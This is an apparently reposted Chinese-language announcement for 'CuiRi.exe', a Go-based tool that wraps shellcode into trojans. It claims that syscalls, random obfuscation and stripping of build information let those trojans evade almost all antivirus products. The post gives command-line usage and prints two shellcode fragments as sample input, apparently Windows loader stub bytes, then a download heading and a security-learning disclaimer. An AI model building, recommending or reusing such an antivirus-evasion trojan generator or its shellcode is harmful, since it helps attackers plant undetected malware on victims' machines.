基于Syscall进行免杀，且随机混淆，可过几乎所有杀软内置go-strip对Go生成的木马进行编译信息抹除与程序信息混淆工具本体只有1个exe，搭配Go环境即可直接使用

工具使用

Usage of CuiRi.exe:  -f string    通过shellcode生成免杀马  -manual      查看shellcode生成方法

"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52""\x48\x31\xd2\x51\x65\x48\x8b\x52\x60\x56\x48\x8b\x52\x18\x48""\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9""\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41""\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"

fce8 8900 0000 6089 e531 d264 8b52 308b520c 8b52 148b 7228 0fb7 4a26 31ff 31c0ac3c 617c 022c 20c1 cf0d 01c7 e2f0 52578b52 108b 423c 01d0 8b40 7885 c074 4a01d050 8b48 188b 5820 01d3 e33c 498b 348b01d6 31ff 31c0 acc1 cf0d 01c7 38e0 75f4037d f83b 7d24 75e2 588b 5824 01d3 668b

下载地址

文章来源：EchoSec

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！

END